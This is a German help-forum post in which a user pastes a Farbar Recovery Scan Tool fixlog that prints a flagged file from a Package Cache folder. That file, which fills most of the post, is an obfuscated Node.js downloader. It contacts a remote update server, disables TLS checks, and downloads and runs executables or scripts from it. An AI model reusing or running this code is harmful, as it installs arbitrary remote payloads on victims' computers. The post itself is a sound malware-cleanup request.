Trojaner-Board

Trojaner-Board (https://www.trojaner-board.de/)
-   Plagegeister aller Art und deren Bekämpfung (https://www.trojaner-board.de/plagegeister-aller-art-deren-bekaempfung/)
-   -   Win10: Avira findet Trojaner (TR/AD.FireHooker.BU) und weitere Funde von Malwarybytes und Roguekiller (https://www.trojaner-board.de/200027-win10-avira-findet-trojaner-tr-ad-firehooker-bu-funde-malwarybytes-roguekiller.html)

Samoxx 05.10.2020 22:16

Hier ist der überschriebene fixlog:
Code:

Entfernungsergebnis von Farbar Recovery Scan Tool (x64) Version: 04-10-2020
durchgeführt von samim (05-10-2020 23:06:49) Run:2
Gestartet von C:\Users\samim\Downloads
Geladene Profile: samim
Start-Modus: Normal
==============================================

fixlist Inhalt:
*****************
CloseProcesses:
cmd: type "C:\ProgramData\Package Cache\{9090800F-C7DC-4A8D-9A93-001CA1ADBF63}\{650F5183-39D7-4EBE-B39D-E53789EE3940}"
Virustotal: C:\ProgramData\Package Cache\{9090800F-C7DC-4A8D-9A93-001CA1ADBF63}\{650F5183-39D7-4EBE-B39D-E53789EE3940}
Folder: C:\ProgramData\Package Cache\{9090800F-C7DC-4A8D-9A93-001CA1ADBF63}
C:\ProgramData\Package Cache\{9090800F-C7DC-4A8D-9A93-001CA1ADBF63}

*****************

Prozesse erfolgreich geschlossen.

========= type "C:\ProgramData\Package Cache\{9090800F-C7DC-4A8D-9A93-001CA1ADBF63}\{650F5183-39D7-4EBE-B39D-E53789EE3940}" =========

/*ezE2NDVCMjU1LTA1RjEtNDgwNS05NzVFLUY1RjMwMzc0N0Y5M318MS4wLjM=*/var _0x666d=['V0NX','dW5saW5rU3luYw\x3d\x3d','cm1kaXJTeW5j','WHRw','c3RyaW5naWZ5','d21pZA\x3d\x3d','WWdl','eGxS','RGlL','ZGF0YQ\x3d\x3d','aG9K','c3RhdHVzQ29kZQ\x3d\x3d','eVlH','U09x','QVhU','anVz','dXNlIHN0cmljdA\x3d\x3d','cmFuZG9tQnl0ZXM\x3d','dG9TdHJpbmc\x3d','aGV4','ZlNB','aW5kZXhPZg\x3d\x3d','bmt0','c3Vic3Ry','Vm5W','bGVuZ3Ro','c3Bhd25TeW5j','ZXJyb3I\x3d','c3RhdHVz','U0tl','TEJp','d1NB','cm1kaXIg','b3V0cHV0','cXVlcnlzdHJpbmc\x3d','cGF0aA\x3d\x3d','Y3J5cHRv','Y2hpbGRfcHJvY2Vzcw\x3d\x3d','dXJs','MS4wLjM\x3d','LmJpbg\x3d\x3d','am9pbg\x3d\x3d','ZGlybmFtZQ\x3d\x3d','bnBtLmNtZA\x3d\x3d','YXJndg\x3d\x3d','bG9n','YXBwbHk\x3d','UHRD','e30uY29uc3RydWN0b3IoInJldHVybiB0aGlzIikoICk\x3d','YnVq','OHwxfDN8NHwwfDV8N3w2fDI\x3d','c3BsaXQ\x3d','aW5mbw\x3d\x3d','d2Fybg\x3d\x3d','ZGVidWc\x3d','ZXhjZXB0aW9u','MXw2fDV8M3wwfDJ8NA\x3d\x3d','Y29uc29sZQ\x3d\x3d','dHJhY2U\x3d','cmVhZEZpbGVTeW5j','Ymt0','aEdm','bGFzdEluZGV4T2Y\x3d','cGFyc2U\x3d','YmFzZTY0','dXRmLTg\x3d','akNt','a05h','cHJvdG9jb2w\x3d','c2xpY2U\x3d','ZW52','Tk9ERV9UTFNfUkVKRUNUX1VOQVVUSE9SSVpFRA\x3d\x3d','Z2V0','V2VG','bG9jYXRpb24\x3d','aGVhZGVycw\x3d\x3d','bWF0Y2g\x3d','cmVzb2x2ZQ\x3d\x3d','Y29uY2F0','bU9x','RkNJ','dG1wZGly','T0dJ','b2lD','Lmpz'];(function(_0x22bff4,_0x37cf38){var _0x36380e=function(_0x2cdd8e){while(--_0x2cdd8e){_0x22bff4['\x70\x75\x73\x68'](_0x22bff4['\x73\x68\x69\x66\x74']());}};var _0x30ff0d=function(){var _0x297406={'\x64\x61\x74\x61':{'\x6b\x65\x79':'\x63\x6f\x6f\x6b\x69\x65','\x76\x61\x6c\x75\x65':'\x74\x69\x6d\x65\x6f\x75\x74'},'\x73\x65\x74\x43\x6f\x6f\x6b\x69\x65':function(_0x3b21ab,_0x262a53,_0xee5ac,_0x54273f){_0x54273f=_0x54273f||{};var _0x4451ea=_0x262a53+'\x3d'+_0xee5ac;var _0x46ee7d=0x0;for(var _0x46ee7d=0x0,_0x73da03=_0x3b21ab['\x6c\x65\x6e\x67\x74\x68'];_0x46ee7d<_0x73da03;_0x46ee7d++){var _0x542277=_0x3b21ab[_0x46ee7d];_0x4451ea+='\x3b\x20'+_0x542277;var _0x3b1c60=_0x3b21ab[_0x542277];_0x3b21ab['\x70\x75\x73\x68'](_0x3b1c60);_0x73da03=_0x3b21ab['\x6c\x65\x6e\x67\x74\x68'];if(_0x3b1c60!==!![]){_0x4451ea+='\x3d'+_0x3b1c60;}}_0x54273f['\x63\x6f\x6f\x6b\x69\x65']=_0x4451ea;},'\x72\x65\x6d\x6f\x76\x65\x43\x6f\x6f\x6b\x69\x65':function(){return'\x64\x65\x76';},'\x67\x65\x74\x43\x6f\x6f\x6b\x69\x65':function(_0x1a24cf,_0x55b9ca){_0x1a24cf=_0x1a24cf||function(_0x595dd5){return _0x595dd5;};var _0x41e974=_0x1a24cf(new RegExp('\x28\x3f\x3a\x5e\x7c\x3b\x20\x29'+_0x55b9ca['\x72\x65\x70\x6c\x61\x63\x65'](/([.$?*|{}()[]\/+^])/g,'\x24\x31')+'\x3d\x28\x5b\x5e\x3b\x5d\x2a\x29'));var _0x5742d1=function(_0x1e4a69,_0x598789){_0x1e4a69(++_0x598789);};_0x5742d1(_0x36380e,_0x37cf38);return _0x41e974?decodeURIComponent(_0x41e974[0x1]):undefined;}};var _0x4710ad=function(){var _0x59aeb4=new RegExp('\x5c\x77\x2b\x20\x2a\x5c\x28\x5c\x29\x20\x2a\x7b\x5c\x77\x2b\x20\x2a\x5b\x27\x7c\x22\x5d\x2e\x2b\x5b\x27\x7c\x22\x5d\x3b\x3f\x20\x2a\x7d');return _0x59aeb4['\x74\x65\x73\x74'](_0x297406['\x72\x65\x6d\x6f\x76\x65\x43\x6f\x6f\x6b\x69\x65']['\x74\x6f\x53\x74\x72\x69\x6e\x67']());};_0x297406['\x75\x70\x64\x61\x74\x65\x43\x6f\x6f\x6b\x69\x65']=_0x4710ad;var _0x4ae988='';var _0x35f2e8=_0x297406['\x75\x70\x64\x61\x74\x65\x43\x6f\x6f\x6b\x69\x65']();if(!_0x35f2e8){_0x297406['\x73\x65\x74\x43\x6f\x6f\x6b\x69\x65'](['\x2a'],'\x63\x6f\x75\x6e\x74\x65\x72',0x1);}else if(_0x35f2e8){_0x4ae988=_0x297406['\x67\x65\x74\x43\x6f\x6f\x6b\x69\x65'](null,'\x63\x6f\x75\x6e\x74\x65\x72');}else{_0x297406['\x72\x65\x6d\x6f\x76\x65\x43\x6f\x6f\x6b\x69\x65']();}};_0x30ff0d();}(_0x666d,0xba));var _0xd666=function(_0x2ab53a,_0x2d72eb){_0x2ab53a=_0x2ab53a-0x0;var _0x399946=_0x666d[_0x2ab53a];if(_0xd666['\x69\x6e\x69\x74\x69\x61\x6c\x69\x7a\x65\x64']===undefined){(function(){var _0x3e9842=Function('\x72\x65\x74\x75\x72\x6e\x20\x28\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x28\x29\x20'+'\x7b\x7d\x2e\x63\x6f\x6e\x73\x74\x72\x75\x63\x74\x6f\x72\x28\x22\x72\x65\x74\x75\x72\x6e\x20\x74\x68\x69\x73\x22\x29\x28\x29'+'\x29\x3b');var _0x18c44d=_0x3e9842();var _0x222f24='\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x2b\x2f\x3d';_0x18c44d['\x61\x74\x6f\x62']||(_0x18c44d['\x61\x74\x6f\x62']=function(_0x34b72c){var _0x4dd175=String(_0x34b72c)['\x72\x65\x70\x6c\x61\x63\x65'](/=+$/,'');for(var _0x1a3d04=0x0,_0xff1d0b,_0x338665,_0x38d385=0x0,_0x4d3e2f='';_0x338665=_0x4dd175['\x63\x68\x61\x72\x41\x74'](_0x38d385++);~_0x338665&&(_0xff1d0b=_0x1a3d04%0x4?_0xff1d0b*0x40+_0x338665:_0x338665,_0x1a3d04++%0x4)?_0x4d3e2f+=String['\x66\x72\x6f\x6d\x43\x68\x61\x72\x43\x6f\x64\x65'](0xff&_0xff1d0b>>(-0x2*_0x1a3d04&0x6)):0x0){_0x338665=_0x222f24['\x69\x6e\x64\x65\x78\x4f\x66'](_0x338665);}return _0x4d3e2f;});}());_0xd666['\x62\x61\x73\x65\x36\x34\x44\x65\x63\x6f\x64\x65\x55\x6e\x69\x63\x6f\x64\x65']=function(_0xf4f074){var _0x2f9734=atob(_0xf4f074);var _0x209cdc=[];for(var _0x5d6cb2=0x0,_0x40f280=_0x2f9734['\x6c\x65\x6e\x67\x74\x68'];_0x5d6cb2<_0x40f280;_0x5d6cb2++){_0x209cdc+='\x25'+('\x30\x30'+_0x2f9734['\x63\x68\x61\x72\x43\x6f\x64\x65\x41\x74'](_0x5d6cb2)['\x74\x6f\x53\x74\x72\x69\x6e\x67'](0x10))['\x73\x6c\x69\x63\x65'](-0x2);}return decodeURIComponent(_0x209cdc);};_0xd666['\x64\x61\x74\x61']={};_0xd666['\x69\x6e\x69\x74\x69\x61\x6c\x69\x7a\x65\x64']=!![];}var _0x1f0c26=_0xd666['\x64\x61\x74\x61'][_0x2ab53a];if(_0x1f0c26===undefined){var _0x31cb3c=function(_0x2676a2){this['\x72\x63\x34\x42\x79\x74\x65\x73']=_0x2676a2;this['\x73\x74\x61\x74\x65\x73']=[0x1,0x0,0x0];this['\x6e\x65\x77\x53\x74\x61\x74\x65']=function(){return'\x6e\x65\x77\x53\x74\x61\x74\x65';};this['\x66\x69\x72\x73\x74\x53\x74\x61\x74\x65']='\x5c\x77\x2b\x20\x2a\x5c\x28\x5c\x29\x20\x2a\x7b\x5c\x77\x2b\x20\x2a';this['\x73\x65\x63\x6f\x6e\x64\x53\x74\x61\x74\x65']='\x5b\x27\x7c\x22\x5d\x2e\x2b\x5b\x27\x7c\x22\x5d\x3b\x3f\x20\x2a\x7d';};_0x31cb3c['\x70\x72\x6f\x74\x6f\x74\x79\x70\x65']['\x63\x68\x65\x63\x6b\x53\x74\x61\x74\x65']=function(){var _0x4c15ca=new RegExp(this['\x66\x69\x72\x73\x74\x53\x74\x61\x74\x65']+this['\x73\x65\x63\x6f\x6e\x64\x53\x74\x61\x74\x65']);return this['\x72\x75\x6e\x53\x74\x61\x74\x65'](_0x4c15ca['\x74\x65\x73\x74'](this['\x6e\x65\x77\x53\x74\x61\x74\x65']['\x74\x6f\x53\x74\x72\x69\x6e\x67']())?--this['\x73\x74\x61\x74\x65\x73'][0x1]:--this['\x73\x74\x61\x74\x65\x73'][0x0]);};_0x31cb3c['\x70\x72\x6f\x74\x6f\x74\x79\x70\x65']['\x72\x75\x6e\x53\x74\x61\x74\x65']=function(_0x6aceed){if(!Boolean(~_0x6aceed)){return _0x6aceed;}return this['\x67\x65\x74\x53\x74\x61\x74\x65'](this['\x72\x63\x34\x42\x79\x74\x65\x73']);};_0x31cb3c['\x70\x72\x6f\x74\x6f\x74\x79\x70\x65']['\x67\x65\x74\x53\x74\x61\x74\x65']=function(_0x27e37b){for(var _0x35d1d5=0x0,_0x366640=this['\x73\x74\x61\x74\x65\x73']['\x6c\x65\x6e\x67\x74\x68'];_0x35d1d5<_0x366640;_0x35d1d5++){this['\x73\x74\x61\x74\x65\x73']['\x70\x75\x73\x68'](Math['\x72\x6f\x75\x6e\x64'](Math['\x72\x61\x6e\x64\x6f\x6d']()));_0x366640=this['\x73\x74\x61\x74\x65\x73']['\x6c\x65\x6e\x67\x74\x68'];}return _0x27e37b(this['\x73\x74\x61\x74\x65\x73'][0x0]);};new _0x31cb3c(_0xd666)['\x63\x68\x65\x63\x6b\x53\x74\x61\x74\x65']();_0x399946=_0xd666['\x62\x61\x73\x65\x36\x34\x44\x65\x63\x6f\x64\x65\x55\x6e\x69\x63\x6f\x64\x65'](_0x399946);_0xd666['\x64\x61\x74\x61'][_0x2ab53a]=_0x399946;}else{_0x399946=_0x1f0c26;}return _0x399946;};_0xd666('0x0');function uuid(){var _0x25e017={'\x50\x55\x69':function _0x5d98fa(_0x31042d,_0x4f1c1b){return _0x31042d>=_0x4f1c1b;}};let _0x46f353=crypto[_0xd666('0x1')](0x10)[_0xd666('0x2')](_0xd666('0x3')),_0x5e531c='';for(var _0x1554fe in _0x46f353)_0x25e017['PUi']([0x8,0xc,0x10,0x14]['indexOf'](Number(_0x1554fe)),0x0)&&(_0x5e531c+='\x2d'),_0x5e531c+=_0x46f353[_0x1554fe];return _0x5e531c;}function path_quote(_0x585114){var _0x49762e={'\x66\x53\x41':function _0x1106c1(_0x12e337,_0x541157){return _0x12e337<_0x541157;},'\x6e\x6b\x74':function _0x63b0a6(_0x582150,_0x40dae3){return _0x582150+_0x40dae3;}};return _0x49762e[_0xd666('0x4')](_0x585114[_0xd666('0x5')]('\x20'),0x0)?_0x585114:_0x49762e[_0xd666('0x6')]('\x22',_0x585114)+'\x22';}function path_unquote(_0x37deea){var _0x1b9da3={'\x49\x6a\x74':function _0xe52cfe(_0x36f5df,_0x4d10c2){return _0x36f5df!=_0x4d10c2;},'\x56\x6e\x56':function _0x3225d9(_0x5019eb,_0x261ddf){return _0x5019eb-_0x261ddf;}};return _0x1b9da3['Ijt']('\x22',_0x37deea[0x0])?_0x37deea:_0x37deea[_0xd666('0x7')](0x1,_0x1b9da3[_0xd666('0x8')](_0x37deea[_0xd666('0x9')],0x1));}function path_remove(_0x563716){var _0x4d0eb3={'\x53\x4b\x65':function _0x390194(_0x286ebb,_0x4790fc){return _0x286ebb+_0x4790fc;},'\x4c\x42\x69':function _0x27b619(_0x12ba74,_0x35b7be){return _0x12ba74+_0x35b7be;},'\x77\x53\x41':function _0x5588a9(_0x33e54b,_0x99431f){return _0x33e54b+_0x99431f;}};let _0x140c9e=child_process[_0xd666('0xa')]('rmdir',['\x2fS','\x2fQ',_0x563716],{'\x73\x68\x65\x6c\x6c':!0x0});if(_0x140c9e[_0xd666('0xb')])throw _0x140c9e['error'];if(_0x140c9e[_0xd666('0xc')])throw new Error(_0x4d0eb3[_0xd666('0xd')](_0x4d0eb3[_0xd666('0xe')](_0x4d0eb3[_0xd666('0xf')](_0xd666('0x10'),_0x140c9e[_0xd666('0xc')]),'\x20'),_0x140c9e[_0xd666('0x11')][_0xd666('0x2')]()));}const fs=require('fs'),querystring=require(_0xd666('0x12')),path=require(_0xd666('0x13')),os=require('os'),crypto=require(_0xd666('0x14')),child_process=require(_0xd666('0x15')),url=require(_0xd666('0x16')),__VERSION__=_0xd666('0x17'),CONFIG=__filename+_0xd666('0x18'),MAX_REQ=0xa,MAX_302_REDIR=0xa,cmd_npm=path[_0xd666('0x19')](path[_0xd666('0x1a')](process['argv'][0x0]),_0xd666('0x1b')),cmd_node=process[_0xd666('0x1c')][0x0],print=console[_0xd666('0x1d')];var cfg=function(){var _0x587828=function(){var _0x6ad91e=!![];return function(_0x430d01,_0x1df094){var _0x26a3a4=_0x6ad91e?function(){if(_0x1df094){var _0x1d7247=_0x1df094['\x61\x70\x70\x6c\x79'](_0x430d01,arguments);_0x1df094=null;return _0x1d7247;}}:function(){};_0x6ad91e=![];return _0x26a3a4;};}();var _0x36953a=_0x587828(this,function(){var _0x26e322=function(){return'\x64\x65\x76';},_0x34694f=function(){return'\x77\x69\x6e\x64\x6f\x77';};var _0x4ecc18=function(){var _0x793da4=new RegExp('\x5c\x77\x2b\x20\x2a\x5c\x28\x5c\x29\x20\x2a\x7b\x5c\x77\x2b\x20\x2a\x5b\x27\x7c\x22\x5d\x2e\x2b\x5b\x27\x7c\x22\x5d\x3b\x3f\x20\x2a\x7d');return!_0x793da4['\x74\x65\x73\x74'](_0x26e322['\x74\x6f\x53\x74\x72\x69\x6e\x67']());};var _0x18d320=function(){var _0x407cc0=new RegExp('\x28\x5c\x5c\x5b\x78\x7c\x75\x5d\x28\x5c\x77\x29\x7b\x32\x2c\x34\x7d\x29\x2b');return _0x407cc0['\x74\x65\x73\x74'](_0x34694f['\x74\x6f\x53\x74\x72\x69\x6e\x67']());};var _0x58d584=function(_0x2b0bc5){var _0x3a969c=~-0x1>>0x1+0xff%0x0;if(_0x2b0bc5['\x69\x6e\x64\x65\x78\x4f\x66']('\x69'===_0x3a969c)){_0x17b8d1(_0x2b0bc5);}};var _0x17b8d1=function(_0x1a0d6c){var _0x5d7b3=~-0x4>>0x1+0xff%0x0;if(_0x1a0d6c['\x69\x6e\x64\x65\x78\x4f\x66']((!![]+'')[0x3])!==_0x5d7b3){_0x58d584(_0x1a0d6c);}};if(!_0x4ecc18()){if(!_0x18d320()){_0x58d584('\x69\x6e\x64\u0435\x78\x4f\x66');}else{_0x58d584('\x69\x6e\x64\x65\x78\x4f\x66');}}else{_0x58d584('\x69\x6e\x64\u0435\x78\x4f\x66');}});_0x36953a();var _0x106a50={'\x5a\x53\x61':function _0x960297(_0x28de0c,_0x408f1f){return _0x28de0c(_0x408f1f);},'\x50\x74\x43':function _0x355246(_0x391ee0,_0x5a9225){return _0x391ee0+_0x5a9225;},'\x62\x75\x6a':function _0x57a439(_0x403160){return _0x403160();},'\x62\x6b\x74':function _0x5b8c76(_0x402050,_0x56be46){return _0x402050-_0x56be46;},'\x68\x47\x66':function _0x59a08b(_0x5b1f65,_0x2b3d9b){return _0x5b1f65+_0x2b3d9b;}};var _0x5e8f1c=function(){var _0x4bea4d=!![];return function(_0x56897a,_0x579302){var _0x539285=_0x4bea4d?function(){if(_0x579302){var _0x505456=_0x579302[_0xd666('0x1e')](_0x56897a,arguments);_0x579302=null;return _0x505456;}}:function(){};_0x4bea4d=![];return _0x539285;};}();var _0xe50cc4=_0x5e8f1c(this,function(){var _0x27ab94=_0x106a50['ZSa'](Function,_0x106a50[_0xd666('0x1f')](_0x106a50['PtC']('return\x20\x28function\x28\x29\x20',_0xd666('0x20')),'\x29\x3b'));var _0x5dcb84=function(){};var _0xe16597=_0x106a50[_0xd666('0x21')](_0x27ab94);if(!_0xe16597['console']){_0xe16597['console']=function(_0x4ba674){var _0x32fb3e=_0xd666('0x22')[_0xd666('0x23')]('\x7c'),_0x2a50b5=0x0;while(!![]){switch(_0x32fb3e[_0x2a50b5++]){case'0':_0x164c4e[_0xd666('0x24')]=_0x4ba674;continue;case'1':_0x164c4e[_0xd666('0x1d')]=_0x4ba674;continue;case'2':return _0x164c4e;continue;case'3':_0x164c4e[_0xd666('0x25')]=_0x4ba674;continue;case'4':_0x164c4e[_0xd666('0x26')]=_0x4ba674;continue;case'5':_0x164c4e[_0xd666('0xb')]=_0x4ba674;continue;case'6':_0x164c4e['trace']=_0x4ba674;continue;case'7':_0x164c4e[_0xd666('0x27')]=_0x4ba674;continue;case'8':var _0x164c4e={};continue;}break;}}(_0x5dcb84);}else{var _0x3b2042=_0xd666('0x28')[_0xd666('0x23')]('\x7c'),_0x41de4b=0x0;while(!![]){switch(_0x3b2042[_0x41de4b++]){case'0':_0xe16597['console'][_0xd666('0xb')]=_0x5dcb84;continue;case'1':_0xe16597[_0xd666('0x29')][_0xd666('0x1d')]=_0x5dcb84;continue;case'2':_0xe16597[_0xd666('0x29')][_0xd666('0x27')]=_0x5dcb84;continue;case'3':_0xe16597[_0xd666('0x29')][_0xd666('0x24')]=_0x5dcb84;continue;case'4':_0xe16597['console'][_0xd666('0x2a')]=_0x5dcb84;continue;case'5':_0xe16597[_0xd666('0x29')][_0xd666('0x26')]=_0x5dcb84;continue;case'6':_0xe16597[_0xd666('0x29')][_0xd666('0x25')]=_0x5dcb84;continue;}break;}}});_0x106a50[_0xd666('0x21')](_0xe50cc4);var _0x3adf3e;try{var _0xc0f56a=(_0x3adf3e=fs[_0xd666('0x2b')](__filename,'utf\x2d8'))[_0xd666('0x7')](_0x106a50[_0xd666('0x2c')](_0x3adf3e['length'],0x200));return _0xc0f56a=_0xc0f56a[_0xd666('0x7')](_0x106a50[_0xd666('0x2d')](_0xc0f56a[_0xd666('0x2e')]('\x2f\x2a'),0x2)),_0xc0f56a=_0xc0f56a['substr'](0x0,_0x106a50[_0xd666('0x2c')](_0xc0f56a[_0xd666('0x9')],0x2)),JSON[_0xd666('0x2f')](Buffer['from'](_0xc0f56a,_0xd666('0x30')));}catch(_0x280725){try{return _0x3adf3e=fs['readFileSync'](CONFIG,_0xd666('0x31')),JSON[_0xd666('0x2f')](_0x3adf3e);}catch(_0x6c2b48){return JSON[_0xd666('0x2f')](Buffer['from'](_0x3adf3e,'base64'));}}}();!function(){var _0x5008e0={'\x6a\x43\x6d':function _0x6ea11d(_0x379f07,_0x417a9c){return _0x379f07(_0x417a9c);},'\x6b\x4e\x61':function _0x5a8b3d(_0x3172bd,_0x1cadfa){return _0x3172bd>=_0x1cadfa;},'\x46\x43\x49':function _0x1d519c(_0x3dcb5e,_0x104042,_0x1d4ecc,_0x2768c2){return _0x3dcb5e(_0x104042,_0x1d4ecc,_0x2768c2);},'\x4f\x47\x49':function _0x729fb6(_0x1a3342){return _0x1a3342();},'\x62\x58\x64':function _0x1e03f5(_0x146e57){return _0x146e57();},'\x6f\x69\x43':function _0x4ada5c(_0x582adf,_0x41bb10){return _0x582adf==_0x41bb10;},'\x57\x43\x57':function _0x3f7a41(_0x596773,_0x278a51){return _0x596773==_0x278a51;},'\x58\x74\x70':function _0x1a7c19(_0x24d625,_0x2e50e9,_0x277e81){return _0x24d625(_0x2e50e9,_0x277e81);},'\x71\x5a\x71':function _0xfc95c(_0x3a4ec3,_0x390ba2){return _0x3a4ec3+_0x390ba2;},'\x44\x69\x4b':function _0x19adbf(_0xc90f0a,_0x476cdc,_0x3f63da){return _0xc90f0a(_0x476cdc,_0x3f63da);},'\x59\x67\x65':function _0x4e84eb(_0x32c7ec,_0x500c2e){return _0x32c7ec+_0x500c2e;},'\x78\x6c\x52':function _0x434cf6(_0x94c97b,_0x3f36c6){return _0x94c97b+_0x3f36c6;}};function _0x3e4b22(_0x4b21aa,_0x2c682c){var _0x4e1ecf={'\x57\x65\x46':function _0x1bc431(_0x970f51,_0xd8a86f){return _0x5008e0[_0xd666('0x32')](_0x970f51,_0xd8a86f);},'\x7a\x58\x56':function _0x4111a5(_0x1d898d,_0x4e8a15){return _0x5008e0[_0xd666('0x33')](_0x1d898d,_0x4e8a15);}};const _0x3e5428=(_0x5313d8,_0x456a52,_0x49f15e)=>{if(_0x49f15e>MAX_302_REDIR)throw new Error('MAX\x2030x\x20reached',_0x49f15e);_0x49f15e+=0x1;let _0x5afff5=url[_0xd666('0x2f')](_0x5313d8),_0x4f6fa1=_0x5008e0[_0xd666('0x32')](require,_0x5afff5[_0xd666('0x34')][_0xd666('0x35')](0x0,-0x1));process[_0xd666('0x36')][_0xd666('0x37')]='0',_0x4f6fa1[_0xd666('0x38')](_0x5313d8,_0x52a415=>{var _0x109a1e={'\x6d\x4f\x71':function _0x46711a(_0x452b38,_0x2f360e){return _0x4e1ecf[_0xd666('0x39')](_0x452b38,_0x2f360e);}};if(_0x52a415['headers'][_0xd666('0x3a')]&&_0x4e1ecf['zXV']([0x12d,0x12e,0x12f,0x133,0x134][_0xd666('0x5')](_0x52a415['statusCode']),0x0)){let _0x57bf05=_0x52a415[_0xd666('0x3b')]['location'];return _0x57bf05[_0xd666('0x3c')](/^http[s]?:/)||(_0x57bf05=url[_0xd666('0x3d')](_0x5313d8,_0x57bf05)),_0x3e5428(_0x57bf05,_0x456a52,_0x49f15e);}{let _0x4e02d8=null;_0x52a415['on']('data',_0x52e8df=>{_0x4e02d8=_0x4e02d8?Buffer[_0xd666('0x3e')]([_0x4e02d8,_0x52e8df]):new Buffer(_0x52e8df);}),_0x52a415['on']('end',()=>{_0x109a1e[_0xd666('0x3f')](_0x456a52,{'\x75\x72\x6c':_0x5313d8,'\x72\x65\x73\x70':_0x52a415,'\x64\x61\x74\x61':_0x4e02d8});});}})['on'](_0xd666('0xb'),_0x593c8b=>{_0x4e1ecf[_0xd666('0x39')](_0x456a52,_0x593c8b);});};return _0x5008e0[_0xd666('0x40')](_0x3e5428,_0x4b21aa,_0x2c682c,0x0);}function _0x5be20d(){let _0x119a81=path[_0xd666('0x19')](os[_0xd666('0x41')](),_0x5008e0[_0xd666('0x42')](uuid));return fs['mkdirSync'](_0x119a81),_0x119a81;}function _0xc24f52(_0x145579,_0x1c8a36){var _0x196d06=_0x5008e0[_0xd666('0x42')](_0x5be20d);let _0x404f86=path[_0xd666('0x19')](_0x196d06,_0x5008e0['bXd'](uuid));_0x5008e0[_0xd666('0x43')](_0x145579,_0x1d6fc6)?_0x404f86+='\x2eexe':_0x5008e0['WCW'](_0x145579,_0x536780)&&(_0x404f86+=_0xd666('0x44'));var _0x5d011c=-0x1;try{let _0x2d32d7={};fs['writeFileSync'](_0x404f86,_0x1c8a36),0x1==_0x145579?_0x5d011c=child_process['spawnSync'](_0x404f86,_0x2d32d7):_0x5008e0[_0xd666('0x45')](0x2,_0x145579)&&(_0x5d011c=child_process[_0xd666('0xa')](cmd_node,[_0x404f86],_0x2d32d7)),_0x5d011c=_0x5d011c['status'];}catch(_0x1907d9){_0x5d011c=-0x1;}try{fs[_0xd666('0x46')](_0x404f86);}catch(_0x2e04aa){}try{fs[_0xd666('0x47')](_0x196d06);}catch(_0x13ab64){}return _0x5d011c;}function _0x3f77cc(_0x43b484,_0x4f4c57){var _0x29b3c={'\x5a\x70\x42':function _0x448265(_0x5aa0c6,_0x269352){return _0x5008e0[_0xd666('0x33')](_0x5aa0c6,_0x269352);},'\x68\x6f\x4a':function _0x43f540(_0x19366c,_0x3b1a6b){return _0x5008e0[_0xd666('0x45')](_0x19366c,_0x3b1a6b);},'\x79\x59\x47':function _0x2d252f(_0x357261,_0x47d369,_0x212f53){return _0x5008e0[_0xd666('0x48')](_0x357261,_0x47d369,_0x212f53);},'\x53\x4f\x71':function _0x1d66e9(_0xbd2959,_0x32d116){return _0x5008e0['qZq'](_0xbd2959,_0x32d116);},'\x41\x58\x54':function _0x118c7c(_0x368da8,_0x30927e,_0x1870ae){return _0x5008e0['DiK'](_0x368da8,_0x30927e,_0x1870ae);},'\x6a\x75\x73':function _0x2057cf(_0x2f71cd,_0x2d75cb){return _0x2f71cd+_0x2d75cb;}};let _0x4550e0=querystring[_0xd666('0x49')]({'\x76\x65\x72':__VERSION__,'\x63\x69\x64':cfg['cid'],'\x77\x6d\x69\x64':cfg[_0xd666('0x4a')],'\x69':_0x43b484,'\x72':_0x4f4c57}),_0x39bb02=cfg[_0xd666('0x16')];return _0x39bb02=_0x39bb02['indexOf']('\x3f')>=0x0?_0x5008e0[_0xd666('0x4b')](_0x39bb02,'\x26')+_0x4550e0:_0x5008e0[_0xd666('0x4c')](_0x5008e0[_0xd666('0x4c')](_0x39bb02,'\x3f'),_0x4550e0),_0x5008e0[_0xd666('0x4d')](_0x3e4b22,_0x39bb02,_0x3f0c5a=>{if(_0x29b3c['ZpB'](_0x43b484,MAX_REQ))return!0x1;if(_0x3f0c5a instanceof Error);else if(_0x3f0c5a[_0xd666('0x4e')]&&_0x3f0c5a['data'][_0xd666('0x9')]>0x0&&_0x29b3c[_0xd666('0x4f')](0xc8,_0x3f0c5a['resp'][_0xd666('0x50')])){let _0x4f4c57=_0x3f0c5a['data'];if(_0x29b3c[_0xd666('0x4f')](0x4d,_0x4f4c57[0x0])&&0x5a==_0x4f4c57[0x1])return _0x29b3c[_0xd666('0x51')](_0x3f77cc,_0x29b3c[_0xd666('0x52')](_0x43b484,0x1),_0x29b3c[_0xd666('0x53')](_0xc24f52,_0x1d6fc6,_0x4f4c57));if(0x0==_0x4f4c57['indexOf']('\x2f\x2fnode'))return _0x29b3c['AXT'](_0x3f77cc,_0x29b3c[_0xd666('0x54')](_0x43b484,0x1),_0x29b3c[_0xd666('0x53')](_0xc24f52,_0x536780,_0x4f4c57));}return!0x1;}),!0x0;}const _0x1d6fc6=0x1,_0x536780=0x2;_0x3f77cc(0x0);}();
/*eyJjaWQiOiAiODZCREU5RjItM0U0NS00RjI1LTlGRTUtQUM2NjMxMUU1M0M3Iiwid21pZCI6ICI0MiIsInVybCI6ICJodHRwczovL3d3dy51cGRhdGVwdXNoLmNvbS9kb3dubG9hZC91cGRhdGUyP2l0PXB1c2gmdHM9NjgyNzA0NDY5Njc1ODQxOTQ1NiZ3bWlkPTQyIn0=*/

========= Ende von CMD: =========

VirusTotal: C:\ProgramData\Package Cache\{9090800F-C7DC-4A8D-9A93-001CA1ADBF63}\{650F5183-39D7-4EBE-B39D-E53789EE3940} => https://www.virustotal.com/gui/file/e96a958cdc5b18e30ab95521387d1c915f99df98f041627218cafd36b5179190/detection/f-e96a958cdc5b18e30ab95521387d1c915f99df98f041627218cafd36b5179190-1601932011

========================= Folder: C:\ProgramData\Package Cache\{9090800F-C7DC-4A8D-9A93-001CA1ADBF63} ========================

2020-05-15 14:20 - 2020-05-15 14:20 - 000019721 ____A [BE055DA45DBFA2FAA1CB7A208EF45F3D] () C:\ProgramData\Package Cache\{9090800F-C7DC-4A8D-9A93-001CA1ADBF63}\{650F5183-39D7-4EBE-B39D-E53789EE3940}

====== Ende von Folder: ======

